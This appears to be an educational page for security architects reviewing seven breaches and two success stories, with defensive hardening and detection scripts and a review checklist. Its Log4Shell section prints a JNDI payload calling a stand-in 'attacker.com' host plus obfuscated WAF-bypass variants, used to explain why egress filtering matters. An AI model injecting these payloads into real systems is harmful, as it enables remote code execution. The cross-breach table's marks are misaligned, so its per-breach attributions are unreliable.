Real-World Case Studies
Every architecture failure tells a story about controls that were missing, misconfigured, or ignored. These 9 case studies — 7 breaches and 2 success stories — span supply chain attacks, cloud misconfigurations, zero-days, and identity compromise, representing over $5 billion in damages.
Why Study Breaches as an Architect?
Attack Vector Landscape — 9 Case Studies by Category
Case Study 1: The Equifax Breach (2017)
What Happened
147 million records exposed due to an unpatched Apache Struts vulnerability (CVE-2017-5638). Attackers had access for 76 days before detection.
MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1505.003 (Web Shell), T1078 (Valid Accounts)
Equifax Attack Chain
Architecture Failures
- • Unpatched internet-facing server
- • Expired SSL certificate on monitoring tool
- • Flat network allowed lateral movement
- • Sensitive data not encrypted at rest
- • Poor network segmentation
Lessons Learned
- • Automated patch management is critical
- • Network segmentation limits blast radius
- • Encrypt sensitive data at rest
- • Monitor SSL certificate expiration
- • Defense in depth matters
What Would Have Prevented This
Case Study 2: Capital One Breach (2019)
What Happened
106 million records exposed via SSRF attack against misconfigured AWS WAF. Attacker exploited overly permissive IAM role to access S3 buckets.
MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1552.005 (Cloud Instance Metadata), T1078 (Valid Accounts), T1530 (Data from Cloud Storage)
Capital One SSRF Attack Chain
Architecture Failures
- • WAF role had excessive S3 permissions
- • SSRF not blocked by WAF
- • IMDSv1 allowed credential theft
- • No detection of unusual API calls
- • Sensitive data in S3 not adequately protected
Lessons Learned
- • Apply least privilege to all IAM roles
- • Use Managed Identities to prevent SSRF credential theft
- • Monitor Activity Log for anomalous API activity
- • Regular IAM permission audits
- • Cloud-native security tools matter
Prevention: Enforce IMDSv2 & Least Privilege
# Enforce IMDS restrictions — prevents SSRF-based credential theft (Capital One vector)
# Azure: Restrict access to Instance Metadata Service via NSG & Managed Identity
az vm update \
--resource-group prod-rg \
--name app-vm-01 \
--set identity.type="SystemAssigned"
# Audit ALL VMs for public IP exposure and overly permissive NSGs
az vm list -d --query '[].{Name:name, PublicIP:publicIps, RG:resourceGroup}' -o table
# Terraform: Enforce Managed Identity and block metadata with Azure Policy
resource "azurerm_linux_virtual_machine" "secure" {
identity {
type = "SystemAssigned" # Use managed identity, not stored credentials
}
# No public IP — traffic only from Application Gateway
public_ip_address_id = null
}# Enforce IMDS restrictions — prevents SSRF-based credential theft (Capital One vector)
# Azure: Restrict access to Instance Metadata Service via NSG & Managed Identity
az vm update \
--resource-group prod-rg \
--name app-vm-01 \
--set identity.type="SystemAssigned"
# Audit ALL VMs for public IP exposure and overly permissive NSGs
az vm list -d --query '[].{Name:name, PublicIP:publicIps, RG:resourceGroup}' -o table
# Terraform: Enforce Managed Identity and block metadata with Azure Policy
resource "azurerm_linux_virtual_machine" "secure" {
identity {
type = "SystemAssigned" # Use managed identity, not stored credentials
}
# No public IP — traffic only from Application Gateway
public_ip_address_id = null
}What Would Have Prevented This
Case Study 3: SolarWinds Supply Chain Attack (2020)
What Happened
Nation-state attackers compromised SolarWinds' build system, injecting malware into Orion software updates. 18,000+ organizations installed the backdoor.
Architecture Failures
- • Build server compromise went undetected
- • Code signing didn't prevent injection
- • Trusted software had excessive network access
- • Minimal monitoring of outbound traffic
- • Domain fronting evaded detection
Lessons Learned
- • Secure the software supply chain
- • Reproducible builds for verification
- • Monitor build system integrity
- • Zero Trust for internal software too
- • Limit network access of monitoring tools
SolarWinds Supply Chain Attack Flow
Prevention: Supply Chain Integrity Verification
# === Supply Chain Integrity (lessons from SolarWinds) ===
# 1. Verify SLSA build provenance
cosign verify-attestation \
--type slsaprovenance \
--certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
ghcr.io/org/app:latest
# 2. Generate and scan SBOM for vulnerabilities
syft packages ghcr.io/org/app:latest -o spdx-json > sbom.json
grype sbom:sbom.json --fail-on critical
# 3. Verify artifact signatures before deployment
cosign verify --key cosign.pub ghcr.io/org/app:latest
# 4. Monitor build system integrity (cron job)
sha256sum /usr/local/bin/build-agent > /etc/integrity/build-agent.sha256
# */5 * * * * sha256sum -c /etc/integrity/build-agent.sha256 || alert# === Supply Chain Integrity (lessons from SolarWinds) ===
# 1. Verify SLSA build provenance
cosign verify-attestation \
--type slsaprovenance \
--certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
ghcr.io/org/app:latest
# 2. Generate and scan SBOM for vulnerabilities
syft packages ghcr.io/org/app:latest -o spdx-json > sbom.json
grype sbom:sbom.json --fail-on critical
# 3. Verify artifact signatures before deployment
cosign verify --key cosign.pub ghcr.io/org/app:latest
# 4. Monitor build system integrity (cron job)
sha256sum /usr/local/bin/build-agent > /etc/integrity/build-agent.sha256
# */5 * * * * sha256sum -c /etc/integrity/build-agent.sha256 || alertCase Study 4: Log4Shell (2021)
What Happened
CVE-2021-44228 — a critical RCE in Apache Log4j (CVSS 10.0). JNDI lookups in log messages allowed remote code execution. Affected virtually every Java application.
MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1059.004 (Unix Shell), T1105 (Ingress Tool Transfer)
Log4Shell Attack Flow
Architecture Failures
- • Logging library had network call capability (violates economy of mechanism)
- • No SBOM — orgs didn't know where Log4j was deployed
- • Egress filtering not enforced (allowed LDAP/RMI outbound)
- • WAFs bypassed with obfuscation (${lower:j}ndi)
Lessons Learned
- • Maintain SBOMs for all applications
- • Restrict egress traffic by default
- • Libraries should follow least privilege
- • Defense in depth — patching alone isn't enough
Payload Anatomy — Why WAFs Weren't Enough
Basic payload: ${jndi:ldap://attacker.com/a}
Attackers rapidly developed obfuscated variants to bypass WAF rules:
- •
${${lower:j}ndi:ldap://...}— case manipulation - •
${${::-j}${::-n}${::-d}${::-i}:ldap://...}— string slicing - •
${${env:NaN:-j}ndi:ldap://...}— env variable defaults
These bypassed simple WAF rules matching exact "jndi:" strings — demonstrating why egress filtering (blocking outbound LDAP/RMI) was the critical control, not just input filtering.
Detection & Response Playbook
# === Log4Shell (CVE-2021-44228) Detection & Response ===
# 1. Find vulnerable Log4j JARs
find / -name "log4j-core-*.jar" 2>/dev/null | while read jar; do
version=$(unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | \
grep Implementation-Version | cut -d' ' -f2)
echo "$jar -> v$version"
done
# 2. Scan logs for exploitation attempts
grep -rn 'jndi:' /var/log/ 2>/dev/null
# 3. Block outbound JNDI protocols (egress containment)
iptables -A OUTPUT -p tcp --dport 389 -j DROP # LDAP
iptables -A OUTPUT -p tcp --dport 636 -j DROP # LDAPS
iptables -A OUTPUT -p tcp --dport 1099 -j DROP # RMI
# 4. Emergency mitigation: remove JndiLookup class
zip -q -d log4j-core-*.jar \
org/apache/logging/log4j/core/lookup/JndiLookup.class
# 5. Permanent fix: upgrade to Log4j >= 2.17.1# === Log4Shell (CVE-2021-44228) Detection & Response ===
# 1. Find vulnerable Log4j JARs
find / -name "log4j-core-*.jar" 2>/dev/null | while read jar; do
version=$(unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | \
grep Implementation-Version | cut -d' ' -f2)
echo "$jar -> v$version"
done
# 2. Scan logs for exploitation attempts
grep -rn 'jndi:' /var/log/ 2>/dev/null
# 3. Block outbound JNDI protocols (egress containment)
iptables -A OUTPUT -p tcp --dport 389 -j DROP # LDAP
iptables -A OUTPUT -p tcp --dport 636 -j DROP # LDAPS
iptables -A OUTPUT -p tcp --dport 1099 -j DROP # RMI
# 4. Emergency mitigation: remove JndiLookup class
zip -q -d log4j-core-*.jar \
org/apache/logging/log4j/core/lookup/JndiLookup.class
# 5. Permanent fix: upgrade to Log4j >= 2.17.1Case Study 5: Okta / Lapsus$ (2022)
What Happened
Lapsus$ compromised a third-party support contractor's laptop, gaining access to Okta's internal admin tools. Up to 366 Okta customers' tenants were potentially affected.
MITRE ATT&CK: T1199 (Trusted Relationship), T1078 (Valid Accounts), T1552 (Unsecured Credentials)
Architecture Failures
- • Third-party contractor had admin-level access
- • No separation of privilege for support tools
- • Delayed incident disclosure (2 months)
- • Insufficient access logging on contractor sessions
Lessons Learned
- • Apply Zero Trust to third-party access
- • Time-boxed, audited contractor sessions
- • Separation of duties for admin tools
- • Rapid incident communication to customers
Case Study 6: MOVEit Transfer (2023)
What Happened
CVE-2023-34362 — SQL injection zero-day in Progress MOVEit Transfer exploited by Cl0p ransomware gang. 2,500+ organizations affected, 60M+ individuals' data stolen.
MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1505.003 (Web Shell), T1567 (Exfiltration Over Web Service)
Architecture Failures
- • SQL injection in 2023 — basic input validation missing
- • Web shell deployment not detected
- • File transfer app directly on internet without WAF
- • Mass data exfiltration went unnoticed
Lessons Learned
- • Never expose file transfer tools directly to internet
- • WAF + IDS in front of all public-facing apps
- • Monitor for web shell indicators
- • DLP to detect bulk data exfiltration
Detection: Web Shell Hunting & File Integrity
# === File Transfer Server Hardening (lessons from MOVEit) ===
# 1. Detect unauthorized web shells in MOVEit directories
Get-ChildItem -Path "C:\MOVEitTransfer\wwwroot" -Filter "*.aspx" -Recurse |
Where-Object { $_.Name -notin @("default.aspx","login.aspx","human.aspx") } |
Select-Object FullName, LastWriteTime, Length
# 2. File integrity monitoring vs. known-good baseline
$baseline = Import-Csv "C:\Security\moveit-baseline.csv"
Get-ChildItem -Path "C:\MOVEitTransfer\wwwroot" -Recurse |
ForEach-Object {
$hash = (Get-FileHash $_.FullName -Algorithm SHA256).Hash
$known = $baseline | Where-Object { $_.Path -eq $_.FullName }
if (-not $known -or $known.Hash -ne $hash) {
Write-Warning "ALERT: $($_.FullName) status=$(if($known){'MODIFIED'}else{'NEW'})"
}
}
# 3. Network architecture: NEVER expose file transfer directly
# Place behind reverse proxy + WAF, restrict source IPs, enable DLP# === File Transfer Server Hardening (lessons from MOVEit) ===
# 1. Detect unauthorized web shells in MOVEit directories
Get-ChildItem -Path "C:\MOVEitTransfer\wwwroot" -Filter "*.aspx" -Recurse |
Where-Object { $_.Name -notin @("default.aspx","login.aspx","human.aspx") } |
Select-Object FullName, LastWriteTime, Length
# 2. File integrity monitoring vs. known-good baseline
$baseline = Import-Csv "C:\Security\moveit-baseline.csv"
Get-ChildItem -Path "C:\MOVEitTransfer\wwwroot" -Recurse |
ForEach-Object {
$hash = (Get-FileHash $_.FullName -Algorithm SHA256).Hash
$known = $baseline | Where-Object { $_.Path -eq $_.FullName }
if (-not $known -or $known.Hash -ne $hash) {
Write-Warning "ALERT: $($_.FullName) status=$(if($known){'MODIFIED'}else{'NEW'})"
}
}
# 3. Network architecture: NEVER expose file transfer directly
# Place behind reverse proxy + WAF, restrict source IPs, enable DLPCase Study 7: Microsoft Storm-0558 (2023)
What Happened
Chinese threat actor acquired a Microsoft consumer signing key from a crash dump, using it to forge Azure AD tokens and access government email accounts.
MITRE ATT&CK: T1552.004 (Private Keys), T1606.002 (SAML Tokens), T1114.002 (Email Collection)
Architecture Failures
- • Signing key in crash dump (dev environment leak)
- • Consumer key accepted by enterprise service (validation gap)
- • No key rotation forced after potential exposure
- • Cloud audit logs not available to affected tenants
Lessons Learned
- • Strict key isolation between consumer/enterprise
- • Sanitize crash dumps for sensitive material
- • Token validation must check issuer scope
- • Log access must be available to all customers
Case Study 8: Cloudflare Thanksgiving 2023 (Positive)
What They Did Right
Nation-state attacker (likely related to Okta breach) used stolen OAuth tokens to access Cloudflare's Atlassian server. Due to Zero Trust architecture, the blast radius was minimal despite initial access.
Why the Damage Was Limited
- • Zero Trust segmentation — Atlassian couldn't reach production
- • Rotation of all 5,000 credentials after Okta incident (proactive)
- • Detection within hours via anomalous access patterns
- • Transparent public disclosure with full timeline
- • "Code Red" remediation — rotated every credential, even those not known compromised
Key Architecture Decisions
- • Assume breach mentality operationalized
- • Network segmentation prevented lateral movement to production
- • Comprehensive logging enabled rapid forensics
- • Incident response plan executed within minutes
Case Study 9: Secure Architecture Success - Google BeyondCorp
What They Did Right
After the Aurora attacks, Google rebuilt their security model. BeyondCorp eliminated the corporate network perimeter, implementing Zero Trust before it had a name.
Architecture Decisions
- • No trusted network—all access is identity-based
- • Device trust established through inventory and health
- • Access Proxy mediates all application access
- • Context-aware access policies
- • Works the same from office, home, or coffee shop
Results
- • Eliminated VPN for most use cases
- • Consistent security regardless of location
- • Reduced attack surface dramatically
- • Better user experience than VPN
- • Model widely adopted as Zero Trust
Architecture Review Template
Security Architecture Review Checklist
1. Data Security
- ☐ Data classification completed
- ☐ Encryption at rest for sensitive data (AES-256)
- ☐ TLS 1.2+ for all data in transit
- ☐ Key management strategy defined (KMS/HSM)
- ☐ Data retention and disposal policy
2. Identity & Access
- ☐ Authentication mechanism defined (OAuth 2.0/OIDC)
- ☐ MFA enforced for all human access
- ☐ Authorization model documented (RBAC/ABAC)
- ☐ Service-to-service auth specified (mTLS/JWT)
- ☐ Least privilege applied and verified
- ☐ Account lifecycle management (JIT, deprovisioning)
3. Network Security
- ☐ Trust boundaries identified and documented
- ☐ Network segmentation designed (VPC, subnets)
- ☐ Ingress/egress controls defined
- ☐ DDoS mitigation considered
- ☐ DNS security (DNSSEC, DoH/DoT)
4. Application Security
- ☐ Input validation at every trust boundary
- ☐ OWASP Top 10 / API Top 10 mitigations
- ☐ Secrets management (no hardcoded credentials)
- ☐ Security headers configured (CSP, HSTS, XFO)
- ☐ Dependency scanning in CI/CD pipeline
5. Operations & Resilience
- ☐ Logging and monitoring strategy (SIEM/XDR)
- ☐ Incident response plan documented and tested
- ☐ Backup and recovery tested (RTO/RPO defined)
- ☐ Patch management process with SLAs
- ☐ Supply chain security (SBOM, vendor review)
Document Your Decisions
Framework Alignment
NIST CSF 2.0: RS (Respond), RC (Recover) — lessons for incident response
ISO 27002:2022: A.5.24 (Information Security Incident Management), A.5.25 (Assessment of Information Security Events)
Related: Security Frameworks → | Reference Architectures →
Cross-Cutting Analysis: Patterns Across Breaches
Mapping architectural failures across all 7 breaches reveals which controls deliver the most protection. The table below shows which failures contributed to each incident.
| Architecture Failure | Equifax | CapOne | Solar | Log4j | Okta | MOVEit | Storm | Count |
|---|---|---|---|---|---|---|---|---|
| Inadequate monitoring / logging | ● | ● | ● | ● | ● | ● | 6 | |
| Excessive privileges / permissions | ● | ● | ● | ● | 4 | |||
| Supply chain / third-party trust | ● | ● | ● | 3 | ||||
| Missing / late patching | ● | ● | ● | 3 | ||||
| No egress filtering | ● | ● | ● | 3 | ||||
| Missing network segmentation | ● | ● | 2 | |||||
| No SBOM / asset inventory | ● | 1 | ||||||
| Data not encrypted at rest | ● | ● | 2 |
Key Takeaway: Prioritize Detection
Architecture Case Study Labs
Apply breach analysis techniques to real-world scenarios and strengthen your architecture review skills.